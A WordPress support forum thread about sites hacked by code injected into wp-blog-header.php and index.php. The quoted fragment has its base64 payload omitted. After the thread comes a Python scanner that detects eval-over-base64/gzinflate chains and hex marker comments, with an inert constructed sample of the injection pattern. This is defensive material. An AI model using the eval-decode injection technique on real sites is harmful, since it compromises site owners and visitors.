• All,

    On all WordPress files I find in the footer the following:

    When looking in the wp-blog-header.php file I saw some added code which was not present on a site not showing the text below (I have deleted the content of the wp-blog-header file, but the code below came after something like decode64 ginflate … something like that)

    The lines keep popping up in the footer, even after removing the text/code from the wp-blog-header file.

    All sites have different plugins (some nearly have plugin, just very very basic, they also do not overlap)

    Any ideas?

    re(‘./wp-blog-header.php’); ?>[base64 payload omitted]”))); #/3a5346# ?>re(‘./wp-blog-header.php’); ?>

Viewing 2 replies - 1 through 2 (of 2 total)
  • WordPress 3.04 hacked

    “All sites have different plugins”

    It can happen for many reasons. Shared servers with relaxed or inappropriate permissions are one. Compromised FTP credentials from sources such as malware-infected workstations or PCs are another possibility.

    Not keeping up with security updates and upgrades is another distinct possibility. You have missed some security related updates since 3.0.4. Third party items such as themes and other web applications located on your own domain can contribute. Untrusted sources are always suspect.

    Thread Starter mrwonkish

    (@mrwonkish)

    I have removed the code from my webpages. Also the 3.1.1 site had the same code.

    Avira detected it as follows:

    The file ‘C:\Users\xxxx\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12\3cc664c-253c7238’
    contained a virus or unwanted program ‘JAVA/Exdoer.BC.1’ [virus]
    Action(s) taken:

    I scanned the code offline –> no alerts. I removed the code from both index.php & wp-blog-header.php and set the permissions to 444 instead of 644.

    I think one of the plugins on one of the sites was not OK. Hard to track down what exactly the entry was for this code injection…


The topic ‘WordPress 3.04 hacked?’ is closed to new replies.
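
An added example, not part of the original thread or of WordPress itself: a small scanner for the kind of injection described above, which flags PHP files containing an eval-around-decode chain, a long base64 run, or a hex-tagged comment marker like the `#/3a5346#` in the post. The patterns, the opening marker form `#3a5346#`, and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristic patterns (assumptions for this example, not a complete signature set).
CHECKS = {
    # eval() wrapped around a decode/decompress call, e.g. eval(gzinflate(base64_decode(...)))
    "eval-decode-chain": re.compile(
        rb"\beval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(", re.I),
    # a long unbroken run of base64-alphabet characters, unusual in hand-written PHP
    "long-base64-blob": re.compile(rb"[A-Za-z0-9+/]{200,}"),
    # hex-tagged comment marker such as the "#/3a5346#" seen in the post
    "hex-marker-comment": re.compile(rb"#/?[0-9a-f]{6}#"),
}

def scan_file(path):
    """Return the sorted names of all checks that match the file's bytes."""
    data = Path(path).read_bytes()
    return sorted(name for name, rx in CHECKS.items() if rx.search(data))

def scan_tree(root):
    """Scan every .php file under root; map relative path -> findings (hits only)."""
    root = Path(root)
    hits = {}
    for php in sorted(root.rglob("*.php")):
        found = scan_file(php)
        if found:
            hits[php.relative_to(root).as_posix()] = found
    return hits

def demo():
    """Build a constructed two-file tree (inert sample data) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-blog-header.php").write_text(
            "<?php\nrequire_once( dirname(__FILE__) . '/wp-load.php' );\n")
        inert_blob = "QUJD" * 60  # constructed filler, not a real payload
        (root / "index.php").write_text(
            "<?php\n#3a5346#\neval(gzinflate(base64_decode(\"" + inert_blob
            + "\")));\n#/3a5346#\n?>\n<?php require('./wp-blog-header.php'); ?>\n")
        return scan_tree(root)

if __name__ == "__main__":
    for path, findings in demo().items():
        print(path, findings)
```

Pointing `scan_tree()` at each site's document root lists the files to compare against a clean copy of the same WordPress release; a hit is a lead to inspect, since some legitimate plugins also embed base64 data.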